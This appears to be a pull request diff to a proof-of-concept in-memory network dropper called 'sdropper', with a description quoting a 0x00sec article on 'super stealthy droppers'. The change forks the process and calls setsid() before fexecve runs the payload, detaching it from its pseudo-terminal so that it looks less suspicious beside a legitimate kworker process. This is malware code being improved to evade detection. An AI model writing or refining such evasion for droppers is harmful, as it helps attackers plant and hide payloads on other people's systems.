### PR TITLE
Remove Pseudo terminal from spawned process

### DIFF
--- a/sdropper/poc-net.c
+++ b/sdropper/poc-net.c
@@ -57,8 +57,13 @@ main (int argc, char **argv)
     }
   close (s);
   
-  if (fexecve (fd, args, environ) < 0) exit (1);
-
+  pid_t cpid = fork();
+  if (pid == 0){
+    setsid();
+    if (fexecve (fd, args, environ) < 0) exit (1);
+  }
+  exit(0);
+  
   return 0;
     
 }

--- a/sdropper/poc-net.c
+++ b/sdropper/poc-net.c
@@ -58,7 +58,7 @@ main (int argc, char **argv)
   close (s);
   
   pid_t cpid = fork();
-  if (pid == 0){
+  if (cpid == 0){
     setsid();
     if (fexecve (fd, args, environ) < 0) exit (1);
   }


### PR DESCRIPTION
https://0x00sec.org/t/super-stealthy-droppers/3715

'''
You can see the output for a legit kworker process in the first line, and then you find our doggy program in the second line... which is associated to a pseudo-terminal!!!... I think this can be easily avoided... but I will leave this to you to sharp your UNIX development skills :wink:
'''